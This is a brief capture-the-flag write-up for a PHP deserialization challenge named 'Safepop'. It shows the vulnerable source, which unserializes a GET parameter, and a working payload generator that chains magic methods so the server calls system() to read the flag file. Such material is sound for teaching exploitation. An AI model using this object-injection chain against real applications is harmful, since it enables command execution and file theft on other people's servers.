远古特性

1.png

Safepop

源码:

<?php
error_reporting(E_ALL);
ini_set('display_errors', true);
highlight_file(__FILE__);
class Fun{
    private $func = 'call_user_func_array';
    public function __call($f,$p){
        call_user_func($this->func,$f,$p);
    }
    public function __wakeup(){
        $this->func = '';
        die("Don't serialize me");
    }
}

class Test{
    public function getFlag(){
        system("cat /flag?");
    }
    public function __call($f,$p){
        phpinfo();
    }
    public function __wakeup(){
        echo "serialize me?";
    }
}

class A{
    public $a;
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\n";
        }
        return $this->a->$p();
    }
}

class B{
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}
if(isset($_GET['pop'])){
    $pop = $_GET['pop'];
    $o = unserialize($pop);
    throw new Exception("no pop");
}

payload:

<?php
class B{
    public $p;
    public function __construct($obj)
    {
        $this->a=$obj;
        $this->p ="cat /flag?";
    }
}
class A{
    public $a;
    public function __construct($obj)
    {
        $this->a=$obj;
    }
}
class Test{}
class Fun
{
    private $func = "system";
}
$test = new Test();
$fun = new Fun($test);
$a = new A($fun);
$b = new B($a);
echo urlencode(serialize($b));

Q.E.D.